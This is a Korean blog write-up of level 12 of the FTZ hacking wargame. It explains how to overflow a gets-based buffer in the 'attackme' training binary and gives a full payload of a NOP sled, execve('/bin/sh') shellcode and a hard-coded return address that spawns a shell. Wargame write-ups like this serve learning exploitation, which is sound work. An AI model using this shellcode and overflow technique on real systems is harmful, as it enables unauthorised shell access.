System&Write up/FTZ

FTZ level12 -> level13 Write up

Jubil 2017. 9. 24. 21:49
반응형

FTZ 12 Level

 

ID : level12

Passwd : it is like this

 


접속해서 ls 명령어로 파일과 디렉터리를 확인합니다.

 


cat 명령어로 hint를 열어보면 level11과는 달리 level12에서는 문자열을 gets 함수로 받고 있습니다. main 함수의 인자로 받을 때와 다르게 gets는 코드가 어느정도 실행 된 후에 입력을 받기 때문에 다른 방식으로 넘겨줘야 합니다.

level11 : ./attackme argv[1] 였다면

level12 : (python –c ‘print “문자열”’; cat) | ./attackme

이렇게 | (파이프)를 써서 전달하게 됩니다.



 

메모리 구조는 level11과 동일합니다. 같은 payload를 사용하겠습니다.

level11 Write Up : http://jaemin8852.tistory.com/27

 

payload : (python –c ‘print “\x90”*227 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80” + “\xa0\xf3\xff\xbf"’; cat) | ./attackme

 


이렇게 쉘이 실행됩니다.

 


감사합니다.

반응형

'System&Write up > FTZ' 카테고리의 다른 글

FTZ level16 -> level17 Write up  (0) 2017.09.25
FTZ level15 -> level16 Write up  (0) 2017.09.25
FTZ level14 -> level15 Write up  (0) 2017.09.25
FTZ level13 -> level14 Write up  (0) 2017.09.25
FTZ level11 -> level12 Write up  (0) 2017.09.24